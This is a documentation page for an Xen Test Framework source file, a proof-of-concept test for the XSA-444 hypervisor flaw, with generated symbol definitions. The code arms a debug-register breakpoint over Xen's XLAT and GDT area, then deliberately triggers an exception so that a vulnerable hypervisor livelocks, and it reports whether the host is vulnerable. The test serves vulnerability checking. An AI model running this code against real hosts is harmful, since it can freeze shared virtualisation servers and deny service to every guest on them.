docs/xtf/xsa-444_2main_8c_source.html

#include <xtf.h>


const char test_title[] = "XSA-444 PoC";


void test_main(void)

{

    unsigned long xlat;

    desc_ptr gdtr;

    long rc;


    if ( !cpu_has_dbext )

        return xtf_skip("Skip: DBEXT not available\n");


    sgdt(&gdtr);


    xlat = (gdtr.base & ~((1ul << PAE_L4_PT_SHIFT) - 1)) + 0x80000000ul;


    /* Try to place %dr0 over the XLAT area. */

    rc = hypercall_set_debugreg(0, xlat);

    switch ( rc )

    {

    case 0:

        xtf_failure("Fail: Breakpoint set on XLAT area.  Probably vulnerable to XSA-444\n");

        break;


    case -EPERM:

        return xtf_success("Success: Unable to set breakpoint on XLAT area.  Probably not vulnerable to XSA-444\n");


    default:

        return xtf_error("Error: Unexpected error from set_debugreg(): %ld\n", rc);

    }


    /* Turn %dr0 into a 4G-wide breakpoint, which covers the GDT too. */

    wrmsr(MSR_DR0_ADDR_MASK, ~0u);


    /*

     * Activate %dr0.  From this point on, any reference to the GDT will

     * trigger @#DB.  However, as the hypercall is via SYSCALL, the return is

     * via SYSRET which doesn't trigger @#DB.

     */

    hypercall_set_debugreg(7, DR7_SYM(0, G, RW, 64) | X86_DR7_GE);


    /*

     * Beyond the hypercall setting up %dr7, Xen is running on borrowed time.

     *

     * Any interrupt or non-#DB exception will cause Xen to livelock in

     * hypervisor context, but as long as we don't tickle any @#DB cases, we

     * get to keep running.

     *

     * Force a #UD to cause Xen to livelock, if a stray interrupt hasn't done

     * it for us already.

     */

    asm volatile ("1: ud2a; 2:"

                  _ASM_EXTABLE(1b, 2b));


    /*

     * If vulnerable, Xen won't even reach here.  Cross-check with rc from

     * above to provide a definitive statement.

     */

    if ( rc == -EPERM )

        return xtf_success("Success: Xen didn't livelock.  Not vulnerable to XSA-444\n");


    /*

     * If we're running, then some reasoning in the test is wrong.

     */

    return xtf_error("Error: Breakpoint set on XLAT but Xen didn't livelock\n");

}


/*

 * Local variables:

 * mode: C

 * c-file-style: "BSD"

 * c-basic-offset: 4

 * tab-width: 4

 * indent-tabs-mode: nil

 * End:

 */

cpu_has_dbext
#define cpu_has_dbext
Definition: cpuid.h:91

sgdt
static void sgdt(desc_ptr *gdtr)
Definition: lib.h:347

test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:110

test_title
const char test_title[]
The title of the test.
Definition: main.c:24

EPERM
#define EPERM
Definition: errno.h:15

hypercall_set_debugreg
static long hypercall_set_debugreg(unsigned int reg, unsigned long val)
Definition: hypercall.h:80

_ASM_EXTABLE
#define _ASM_EXTABLE(fault, fixup)
Create an exception table entry.
Definition: extable.h:50

MSR_DR0_ADDR_MASK
#define MSR_DR0_ADDR_MASK
Definition: msr-index.h:68

wrmsr
static void wrmsr(uint32_t idx, uint64_t val)
Thin wrapper around an wrmsr instruction.
Definition: msr.h:55

PAE_L4_PT_SHIFT
#define PAE_L4_PT_SHIFT
Definition: page-pae.h:35

xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94

xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80

xtf_skip
void xtf_skip(const char *fmt,...)
Report a test skip.
Definition: report.c:66

xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38

DR7_SYM
#define DR7_SYM(bp,...)
Create a partial %dr7 setting for a particular breakpoint based on mnemonics.
Definition: x86-dbg-reg.h:100

X86_DR7_GE
#define X86_DR7_GE
Definition: x86-dbg-reg.h:30